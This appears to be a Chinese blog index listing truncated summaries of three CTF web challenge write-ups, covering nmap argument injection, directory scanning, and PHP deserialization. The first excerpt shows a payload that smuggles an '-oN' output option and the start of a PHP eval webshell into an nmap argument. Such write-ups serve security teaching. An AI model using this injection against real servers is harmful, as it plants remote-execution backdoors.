摘要:
[网鼎杯 2020 朱雀组]Nmap nmap 本题的考点是利用nmap的-oN写shell。 nmap -oN xxx.txt 先构造: ' -oN w4ke.txt ' 返回了Host maybe down,然后访问一下w4ke.txt 构造: ' -oN w4ke.php <?php eval 阅读全文
摘要:
[WUSTCTF2020]朴实无华 robots.txt 首先拿御剑扫一下(因为buu上的docker性能不太行,扫多了就崩,所以建议用dirsearch并带上延时)。 扫出了个robots.txt mdzz假flag,傻逼玩意。 在响应头里面有fl4g.php. <?php header('Con 阅读全文
摘要:
[安洵杯 2019]easy_serialize_php 看源码 对源码的一些解释已经注释在源码里了 <?php $function = @$_GET['f']; function filter($img){ //这里会过滤这几个字符 $filter_arr = array('php','flag' 阅读全文